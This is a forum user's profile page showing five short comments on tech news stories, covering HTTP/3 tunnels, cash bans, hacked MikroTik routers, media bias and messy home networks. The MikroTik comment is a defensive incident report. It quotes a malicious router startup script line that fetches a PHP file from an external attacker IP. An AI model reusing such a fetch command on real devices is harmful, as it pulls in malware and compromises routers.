Sign in / up

* Posts by D.U.B

5 publicly visible posts • joined 16 Jan 2018

Quic! Head to the latest Chrome version and try out HTTP/3

D.U.B

While I am no expert, my limited understanding is that these are encrypted UDP tunnels.

All the congestion control, packet loss etc, and Sauasage-Pizza-Away layers, are handled by software on the remote server and in client side software?

Makes it a little harder for Network Admin's to identify traffic in my opinion, all connections are port 443.

No more checking known ports and services-just an opaque wall..who knows whats flowing through the tunnel, WireShark is not my friend here....

I wonder how long until miscreants start utilizing this protocol for data exfiltration, command and control, etc?

1 0

I say, that sucks! Crooks are harnessing hoovers to clean out parking meters in Chelsea

D.U.B

It's not the gangs, the drugs,or the $4 hookers they want to stop.

It's the cash.

They want to ban the cash.

Cash is freedom.

Cash anonymity.

The gangs, drugs, and hookers are jut the aforementioned "for the children" cover story.

Easier to track card tansactions and build travel history.

How long after banning cash before installing cameras and microphones.

Can't build dossiers without data......

5 0

MikroTik routers grab their pickaxes, descend into the crypto mines

D.U.B

Do not know if it is related to this particular botnet, but I found a local WISP I help from time to time had some hacked Mikrotiks.

Symptoms were as follows:

RouterOS version 6.34.x or lower

Multiple outbound connections to ports 8291 (WinBox) and 7547 (tr069)

socks proxy enabled

system scheduler set to run script on startup

contents of script were:

/tool fetch address=95.145.216.160 port=2008 src path=/mikrotik.php

Found said php file in files on infected Mikrotiks

Stopped digging at that point and informed WISP, and helped to mitigate the issue.

Also found similar traffic on a second local WISP, informed them as well.

I was very concerned because these were both my main and backup internet connections.

Upon further investigation I found similar traffic coming in from upstream of my #1 provider, informed the carrier who delivers backbone to both providers a week ago.

Still getting hit pretty hard with incoming traffic that matches the pattern, firewall rules I setup on Wisp #1 main router holding for now...

Southwest Colorado USA

2 0

As Tesla hits speed bump after speed bump, Elon Musk loses his mind in anti-media rant

D.U.B
Reply Icon

Re: Can't have it both ways, guys.

I have to disagree with you here.

While I truly enjoy your articles and truly believe you and The Vulture do not bow down to Corporate Overlords, it would seem you may be an exception to the MainStream rule:

https://www.youtube.com/watch?v=_fHfgU8oMSo

0 0

OK, Google: Why does Chromecast clobber Wi-Fi connections?

D.U.B
Reply Icon
Megaphone

Re: Idiocy from the routers and el reg

On a well planned and executed Network I would totally agree, I can run VM's stored on NFS over the wire at lag free gigabit speeds on my Lan.

You sound savvy, so I would assume you have taken some time to ensure your network works well too.

Here's the thing though, most folks do not.

Most home networks I deal with on a daily basis look more like this:

Hp printer with WiFiDirect enabled, and connect to the wireless router.

Chromecast putting out WiFi, while connected to wireless router.

All the Apples searching for Airplay, Airprint, etc ect

AppleTv doing the bonjour sleep_proxy arp dance, amongst others.

Everybody is running Dropbox Lan client, two or three print status monitors, searching for that Damn Chromecast to cast to, MdnsResponder because "If you wanna manage those iPhones with windows you gets Apple Networking with it.....the list is endless here, much of it multicast and poorly coded it seems.

Billy's Xbox is looking for Friends and Media neighbors...and demands UPnP be found.

That Roku is cramming more extra wifi down my throat.

Crappy DirectTv installer misconfigured the MoCa bridge, again.

Why is this WesternDigitalNas putting out Spanning Tree Packets.

God Damn it, Avast is "helpfully" scanning my network devices, three times, because its on all three of the Kids laptops!!

The Sony tv has a wifi AP built in too?...damn it!

Three NetGear Wireless extenders and the RokuTV's still won't connect?...

Every app on every device is open in the background, searching for local comrades and slurping all that juicy telemetry to phone home.

What's that you say?

Security Cams and Smart thermostats? Smart Dishwasher?

Ports MUST be opened Immediately!!

Pings? Pings?

What are these Wan Pings?....

And Fuck!! where are all these SYN packets coming from?????

Add in the traffic you really want to push.

Add another "100,000 packets in a short time" on top of that.

All of a sudden that $100.00, unpatched, admin/admin, Linksys with the open WiFi bought at WalMart seems to develop a nut allergy....

And don't even get me started on IPv6.....WiFi interference or plug' n play mesh.

Lets face it, the Lan has been overrun by greedy Apps, Services, and Devices.

Average users are less than clueless and lazy to boot, even adamant in their "God Given Right to not have to learn this, it says its compatible!!".

Idiocy Indeed....

6 0